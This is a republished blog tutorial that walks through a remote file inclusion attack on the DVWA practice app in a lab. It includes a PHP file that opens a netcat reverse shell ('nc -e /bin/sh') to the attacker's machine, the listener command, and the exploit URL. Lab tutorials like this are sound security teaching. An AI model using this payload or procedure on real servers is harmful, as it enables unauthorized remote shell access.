当前位置:首页 > 编程语言 > Ethical Hacking - Web Penetration Testing(6)

Ethical Hacking - Web Penetration Testing(6)

2021-04-18 22:29

阅读:404

标签:for   reverse   cti   local   strong   png   tac   create   cut   

REMOTE FILE INCLUSION

  • Similar to local file inclusion.
  • But allows an attacker to read ANY file from ANY server.
  • Execute PHP files from other servers on the current server.
  • Store PHP files on other servers as .txt.

Pre-Condition:

Set allow_url_include to On status.

技术图片

 

 Restart web service

技术图片

 

 

Create a local php file on /var/www/html.

php
passthru("nc -e /bin/sh 10.0.0.13 8080");
?>

技术图片

 

 

Execute the NC command to wait for connection.

nc -vv -l -p 8080

Visit the URL(http://10.0.0.24/dvwa/vulnerabilities/fi/?page=http://10.0.0.13/reverse.txt?) to execute the reverse connection commands.

技术图片

 

 We connect to the target machine successfully.

技术图片

 

Ethical Hacking - Web Penetration Testing(6)

标签:for   reverse   cti   local   strong   png   tac   create   cut   

原文地址:https://www.cnblogs.com/keepmoving1113/p/12274844.html

上一篇:Tomcat(二):Tomcat处理一个Http请求

下一篇:Ajax简单用法

文章来自:搜素材网编程语言模块,转载请注明文章出处。
文章标题:Ethical Hacking - Web Penetration Testing(6)
文章链接:http://soscw.com/index.php/essay/76395.html

评论

亲,登录后才可以留言!

热门文章

推荐文章

最新文章

置顶文章

关于我们 | 版权声明 | 常见问题 | 素材投稿 | 联系我们 | 网站地图 |
搜素材网素材除本站原创外均由用户分享,若发现权利被侵害,请联系及时联系我们,我们会在第一时间进行处理。
特别说明:本站所有资源除本站原创外仅供学习与参考,请勿用于商业用途,如有侵犯您的版权请联系客服服务QQ:点击这里给我发消息
Copyright © 2024 soscw.com 搜素材网素材网版权所有 蜀ICP备18015633号-1